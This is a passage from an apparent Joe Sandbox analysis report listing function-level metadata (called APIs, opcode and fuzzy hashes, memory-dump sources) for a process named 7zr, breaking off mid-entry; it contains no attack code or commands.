                          • Opcode ID: 66a53fbde091b9fb53f9738b39a94f92404e81aaae0c945528edaf4b82a26aac
                          • Instruction ID: e8895a66edca77058654db3a306940a027c582355861361adb0bead7c9ddac65
                          • Opcode Fuzzy Hash: 66a53fbde091b9fb53f9738b39a94f92404e81aaae0c945528edaf4b82a26aac
                          • Instruction Fuzzy Hash: 2041AC75904219DFCF21EFA4C991AEEB7F4BF29300F104429E456A3292DB30AF09CB60
                          APIs
                          • __EH_prolog.LIBCMT ref: 001D1516
                            • Part of subcall function 001D10D3: __EH_prolog.LIBCMT ref: 001D10D8
                          • _CxxThrowException.MSVCRT(?,0023D480), ref: 001D1561
                          Similarity
                          • API ID: H_prolog$ExceptionThrow
                          • String ID:
                          • API String ID: 2366012087-0
                          • Opcode ID: ba83966f72e87da5c3612279c876f41a53ebbbadd0daa0fbb65102a9f364af90
                          • Instruction ID: cff13240b47a8442cdfc906309b9e0908eeadf4c867b57a9261937e56fcbb72d
                          • Opcode Fuzzy Hash: ba83966f72e87da5c3612279c876f41a53ebbbadd0daa0fbb65102a9f364af90
                          • Instruction Fuzzy Hash: 4901F232514288BEDF118F94D815BEF7FB8EF96354F04405AF4055A211C3BAE9A18BA0
                          APIs
                          • __EH_prolog.LIBCMT ref: 001B5800
                          • fputs.MSVCRT ref: 001B5830
                            • Part of subcall function 00181FA0: fputc.MSVCRT ref: 00181FA7
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Similarity
                          • API ID: H_prologfputcfputsfree
                          • String ID:
                          • API String ID: 195749403-0
                          • Opcode ID: ddb337d2fe21d98e625d343030c0968bb61ab89fba9df1550f53fb2d27ef10f6
                          • Instruction ID: 68493812464b015a6acc808da00d993afea1491c33d1e13c2a6b807b900c2974
                          • Opcode Fuzzy Hash: ddb337d2fe21d98e625d343030c0968bb61ab89fba9df1550f53fb2d27ef10f6
                          • Instruction Fuzzy Hash: C9F0BE32904404EBCB16BB94E4027DEBBB1EF14310F10442AE801A20A1CB305A96CF84
                          APIs
                          • SysAllocStringLen.OLEAUT32(?,?), ref: 0018952C
                          • _CxxThrowException.MSVCRT(?,002355B8), ref: 0018954A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AllocExceptionStringThrow
                          • String ID:
                          • API String ID: 3773818493-0
                          • Opcode ID: 1cc6b2bd4dc7eec57671692a72e3ecf5dc7108c7fc23ffd684197789d01164a3
                          • Instruction ID: b556b16b84b399125761069b9322f9a67817eae47f7f76fc9290868973d2c737
                          • Opcode Fuzzy Hash: 1cc6b2bd4dc7eec57671692a72e3ecf5dc7108c7fc23ffd684197789d01164a3
                          • Instruction Fuzzy Hash: C8F065B1210304AFC710EF94D849D9B77ECEF05340740842AF908CB210E770E9508BD0
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$fputc
                          • String ID:
                          • API String ID: 1185151155-0
                          • Opcode ID: b506a98d69a434adf28691fc9190b29612f205dca51439183f4888b4306f87c9
                          • Instruction ID: b1e6cc34081c6a0380addbfba0eb780bcafd29fedc45af57bed48c6aa0f94efd
                          • Opcode Fuzzy Hash: b506a98d69a434adf28691fc9190b29612f205dca51439183f4888b4306f87c9
                          • Instruction Fuzzy Hash: 1BE0C2372091106FD6262B48FC8689837D9DFC9361335002FE740D3264AF933E1A5BB4
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ErrorLast_beginthreadex
                          • String ID:
                          • API String ID: 4034172046-0
                          • Opcode ID: dca20e0d9bc90f4d8de07838ff60432669bddae8d329cdbf0ce2b5598f77eaa5
                          • Instruction ID: 1fa3307a330e09a8331308d33231318a075e157e6126b1781a38f9662208eb94
                          • Opcode Fuzzy Hash: dca20e0d9bc90f4d8de07838ff60432669bddae8d329cdbf0ce2b5598f77eaa5
                          • Instruction Fuzzy Hash: F1E08CB22582026AE3109F609C06FA772E8ABB0B40F50846DBA45C6180E6A0CD50C7A1
                          APIs
                          • GetCurrentProcess.KERNEL32(?,?,00189C6E), ref: 00189C52
                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 00189C59
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: Process$AffinityCurrentMask
                          • String ID:
                          • API String ID: 1231390398-0
                          • Opcode ID: 3eafd22ce9e4197b98c4c76c3cd55712b522e6346ad9dc3c5b74dbfe274786c3
                          • Instruction ID: a5b4cd6d8207f8594f11249372fde07b2cc261940b52dbb1601c1fb595284121
                          • Opcode Fuzzy Hash: 3eafd22ce9e4197b98c4c76c3cd55712b522e6346ad9dc3c5b74dbfe274786c3
                          • Instruction Fuzzy Hash: 0CB092B2400100FBCE209BE0ED0CC1A3B2CEE042013205644B109C2010C636C24A8B68
                          APIs
                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00040000,?), ref: 0018B843
                          • GetLastError.KERNEL32 ref: 0018B8AA
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ErrorLastmemcpy
                          • String ID:
                          • API String ID: 2523627151-0
                          • Opcode ID: b2593ca198c6908aa3992239e512f48ac00b15060215d4f83911a10910fc887a
                          • Instruction ID: 5d7af44f38afda1ad6529c3f9c7bf53506ab791c0520fcb2f054dd5208be4ec0
                          • Opcode Fuzzy Hash: b2593ca198c6908aa3992239e512f48ac00b15060215d4f83911a10910fc887a
                          • Instruction Fuzzy Hash: 16815A71A047059FDB74EE25C9C0AAAB7F6BF85314F244A2EE84687A50E734FA41CF50
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ExceptionThrowmalloc
                          • String ID:
                          • API String ID: 2436765578-0
                          • Opcode ID: 8da7eeabca264a52892d84f2892dd620f8a0bd8b75dd61f4708557b1dba959e9
                          • Instruction ID: e1da03fcace62717eb20fd74594db4d93acbb42140ff3040a82c1f20b559c9a0
                          • Opcode Fuzzy Hash: 8da7eeabca264a52892d84f2892dd620f8a0bd8b75dd61f4708557b1dba959e9
                          • Instruction Fuzzy Hash: C3E08C3101424CBACF116FA0D804BD93BAC5B01359F00A015FC1C8E101C770C7E28B44
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 4b04b9f73c297e1911d5891a422eb1e9b4a870479aacb2766e05bc830287747b
                          • Instruction ID: 64295892b0eabfc121d823f3db7dacaeec417f100870acb40146fbc843a499bd
                          • Opcode Fuzzy Hash: 4b04b9f73c297e1911d5891a422eb1e9b4a870479aacb2766e05bc830287747b
                          • Instruction Fuzzy Hash: 07528B30908249DFDF05CFA8C595BAEBBB5AF69304F28409DE805EB281CB75DE41CB21
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: e1002948f4a63f34642ba5588282bca9c4420237dbdbc47801bcf4af178cf2fe
                          • Instruction ID: 344c0ac8976bd332f6728fa18b737c1420ce6c833a59c17c9602c918dd9d6602
                          • Opcode Fuzzy Hash: e1002948f4a63f34642ba5588282bca9c4420237dbdbc47801bcf4af178cf2fe
                          • Instruction Fuzzy Hash: A4F1ED70A04785DFDF25CFA4C490AAABBF1BF29304F58486EE49A9B211D730BD44CB21
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 3bebf4e04fc2146a02a3adcd49315a74f27234f3ac109eeb3cb9b46b4ef36cae
                          • Instruction ID: b6715f7cebe3095bdac6b2c3433687d6b3d05c2de19578f563ff2012a5976582
                          • Opcode Fuzzy Hash: 3bebf4e04fc2146a02a3adcd49315a74f27234f3ac109eeb3cb9b46b4ef36cae
                          • Instruction Fuzzy Hash: C2D15770A04645BFDF29CFA8C880BEEBBB2BF58314F20452EE455A6751D775A884CB90
                          APIs
                          • __EH_prolog.LIBCMT ref: 001CCF96
                            • Part of subcall function 001D1511: __EH_prolog.LIBCMT ref: 001D1516
                            • Part of subcall function 001D1511: _CxxThrowException.MSVCRT(?,0023D480), ref: 001D1561
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ExceptionThrow
                          • String ID:
                          • API String ID: 2366012087-0
                          • Opcode ID: d4d545001ac5330edbd5d245fae36724400cd037b52a8f43847978b1392b3c4c
                          • Instruction ID: 7c0587f9c92c37e7083afdd2b9af220bd49fd0fccd604cc0ba79e926b3f3a6b4
                          • Opcode Fuzzy Hash: d4d545001ac5330edbd5d245fae36724400cd037b52a8f43847978b1392b3c4c
                          • Instruction Fuzzy Hash: E6514B70900289DFCB11CFA8D888FAEBBB4AF59304F1444AEF45A97242C775DE55CB21
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 682ef26566163b49fffcd782302061fdb808d346b0852b891817e98bc4951211
                          • Instruction ID: af920b9e8b00dc61617ec0a92d2c6b4470f1c38a701e9d740d35ad5bdba74667
                          • Opcode Fuzzy Hash: 682ef26566163b49fffcd782302061fdb808d346b0852b891817e98bc4951211
                          • Instruction Fuzzy Hash: 63516874A00606DFCB14CFA4C8909BAFBB2FF89304B10896DE592AB751D731A916CF90
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: c45b6c6d7789726b809df2516d18e406a3a92b1b7325dc1156ae4b9f2243f881
                          • Instruction ID: 53fc6a207859c47f9e3ea1aca0c7df89eca6175be59e511729cdf2be2ec3810b
                          • Opcode Fuzzy Hash: c45b6c6d7789726b809df2516d18e406a3a92b1b7325dc1156ae4b9f2243f881
                          • Instruction Fuzzy Hash: F141C070A0074AEFDB26CFA4C484F6ABBA0BF24318F548A6DD45697691C370ED81CB91
                          APIs
                          • __EH_prolog.LIBCMT ref: 00194255
                            • Part of subcall function 0019440B: __EH_prolog.LIBCMT ref: 00194410
                            • Part of subcall function 00181E0C: malloc.MSVCRT ref: 00181E1F
                            • Part of subcall function 00181E0C: _CxxThrowException.MSVCRT(?,00234B28), ref: 00181E39
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ExceptionThrowmalloc
                          • String ID:
                          • API String ID: 3744649731-0
                          • Opcode ID: 6802ff9381f3e81ed58d2edc53a1cd1da33dd35946da9227b701f5b9d7c0bd89
                          • Instruction ID: 316506812d149933166a65c082570e42465b715a9bda25a26275b1554740feb1
                          • Opcode Fuzzy Hash: 6802ff9381f3e81ed58d2edc53a1cd1da33dd35946da9227b701f5b9d7c0bd89
                          • Instruction Fuzzy Hash: 4A5108B0801744DFC726DFA9D1846DAFBF4BF29304F5488AEC09A97652D7B4A608CF61
                          APIs
                          • __EH_prolog.LIBCMT ref: 001AD0E6
                            • Part of subcall function 00181E0C: malloc.MSVCRT ref: 00181E1F
                            • Part of subcall function 00181E0C: _CxxThrowException.MSVCRT(?,00234B28), ref: 00181E39
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ExceptionH_prologThrowmalloc
                          • String ID:
                          • API String ID: 3978722251-0
                          • Opcode ID: 5397eb439aff4d31544a005b0c1711b4bc38608d5994ded802503c187dc3283e
                          • Instruction ID: 1575db4723513ba00b5d5fc963512f228afbd8b6b3ba983307afe2d4f0840b8d
                          • Opcode Fuzzy Hash: 5397eb439aff4d31544a005b0c1711b4bc38608d5994ded802503c187dc3283e
                          • Instruction Fuzzy Hash: 1441D575A00214AFCB15DFA8D9847AEBBF8FF5A310F244499E446E7682CB70DE01CB90
                          APIs
                          • __EH_prolog.LIBCMT ref: 00197FCA
                            • Part of subcall function 0018950D: SysAllocStringLen.OLEAUT32(?,?), ref: 0018952C
                            • Part of subcall function 0018950D: _CxxThrowException.MSVCRT(?,002355B8), ref: 0018954A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AllocExceptionH_prologStringThrow
                          • String ID:
                          • API String ID: 1940201546-0
                          • Opcode ID: 06c4d2ebbd2ec9072456b19d7798a6a28950c3af5fbb384f9dc85e596f7e1ada
                          • Instruction ID: a1879b8926ddc74f02c5c2c96892824b8aa540359975c5401a600a0b8d9c779a
                          • Opcode Fuzzy Hash: 06c4d2ebbd2ec9072456b19d7798a6a28950c3af5fbb384f9dc85e596f7e1ada
                          • Instruction Fuzzy Hash: EC319172820109DACF18AFA4C8559FEB770FF26314F59412AF016B7162EF369A08DB51
                          APIs
                          • __EH_prolog.LIBCMT ref: 001BADBC
                            • Part of subcall function 001BAD29: __EH_prolog.LIBCMT ref: 001BAD2E
                            • Part of subcall function 001BAF2D: __EH_prolog.LIBCMT ref: 001BAF32
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 788642f21c0e3fec8dc5efc6612aaf21f38a5c067d6f3e2636997eed7547461e
                          • Instruction ID: 4ae9354f0b0c60e87a7fe1e91f6ec8dddf4f64c11d07b7a38e4e3952eaa5202b
                          • Opcode Fuzzy Hash: 788642f21c0e3fec8dc5efc6612aaf21f38a5c067d6f3e2636997eed7547461e
                          • Instruction Fuzzy Hash: E741BB7144ABC0DEC326DF7881556CAFFE06F35204F94899EC4EA43A52D774A60CCB66
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 3231abfcd0f17d12f70e1db3e153709a28994dde95ee2f4466767d608526c29d
                          • Instruction ID: 004892033b04a9f37e59900f126f1bac3e1224099189af58c84877ddcfcd1c5e
                          • Opcode Fuzzy Hash: 3231abfcd0f17d12f70e1db3e153709a28994dde95ee2f4466767d608526c29d
                          • Instruction Fuzzy Hash: 7F314FB8D00209DFCB15DF94C8A18EEBBB4FF9A364B10811DE42A67241C7309E51CBA0
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A98F7
                            • Part of subcall function 001A9987: __EH_prolog.LIBCMT ref: 001A998C
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 21f1ede35748a22031f61f581939d35eac84286f25e6b01cc1d1b796328b99db
                          • Instruction ID: 86c1c3ba156703bd0338e6f03619185676ac92220182c72e8d2b7dba6da8bc90
                          • Opcode Fuzzy Hash: 21f1ede35748a22031f61f581939d35eac84286f25e6b01cc1d1b796328b99db
                          • Instruction Fuzzy Hash: B0117C39600205AFCB14CF68C884BABB3A9FF9A354F14855CE956DB261CB31EC50CB60
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A021F
                            • Part of subcall function 00193D66: __EH_prolog.LIBCMT ref: 00193D6B
                            • Part of subcall function 00193D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193D7D
                            • Part of subcall function 00193D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193D94
                            • Part of subcall function 00193D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00193DB6
                            • Part of subcall function 00193D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193DCB
                            • Part of subcall function 00193D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193DD5
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                           • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                           • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                          • String ID:
                          • API String ID: 1532160333-0
                          • Opcode ID: c2efd854f93087c89429a87b80ec46f126e144cf1b5758c0bee99562b40fd50a
                          • Instruction ID: 422024960d887bd79e7234092bd73ab9c2ef6b6039e0dd3d4b61d056fbb56a82
                          • Opcode Fuzzy Hash: c2efd854f93087c89429a87b80ec46f126e144cf1b5758c0bee99562b40fd50a
                          • Instruction Fuzzy Hash: 9A214AB1946B90CFC321CF6A82D0686FFF4BB29604B94996FC0DA83B12C370A548CF55
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A1C74
                            • Part of subcall function 00186C72: __EH_prolog.LIBCMT ref: 00186C77
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 4766ea23f67c77e239412ffd0874f2b6ac377351d9114eab46704dda4cb1f7de
                          • Instruction ID: 760f8fa5b6868f935cd03fc9babe7d7bbbeeb6f1714621af2a3b55b52b4c00be
                          • Opcode Fuzzy Hash: 4766ea23f67c77e239412ffd0874f2b6ac377351d9114eab46704dda4cb1f7de
                          • Instruction Fuzzy Hash: 8711C035A00204ABCF1AFBE4D992BEDBB79AF25364F000028E842731D2DF755E46CB94
                          APIs
                          • __EH_prolog.LIBCMT ref: 00197E5F
                            • Part of subcall function 00186C72: __EH_prolog.LIBCMT ref: 00186C77
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                            • Part of subcall function 0018757D: GetLastError.KERNEL32(0018D14C), ref: 0018757D
                          Similarity
                          • API ID: H_prolog$ErrorLastfree
                          • String ID:
                          • API String ID: 683690243-0
                          • Opcode ID: 757a50c5e65797b764230fc162411af05476e90fdc62b6c7a4f9e2c4775c79d7
                          • Instruction ID: 1c435ce5d7217b9aba80bbd2e21378422142b2919a84215334fdeb58b1d42951
                          • Opcode Fuzzy Hash: 757a50c5e65797b764230fc162411af05476e90fdc62b6c7a4f9e2c4775c79d7
                          • Instruction Fuzzy Hash: 130104326447009FC721FFB8D8929DEBBB1EF65310F00462EE88353692CB34AA09CB50
                          APIs
                          • __EH_prolog.LIBCMT ref: 001CBF91
                            • Part of subcall function 001CD144: __EH_prolog.LIBCMT ref: 001CD149
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Similarity
                          • API ID: H_prolog$free
                          • String ID:
                          • API String ID: 2654054672-0
                          • Opcode ID: 2e86235dc800d6e25e4196365cd5e0ac348dc581110ab7437d625c6c1925ac4b
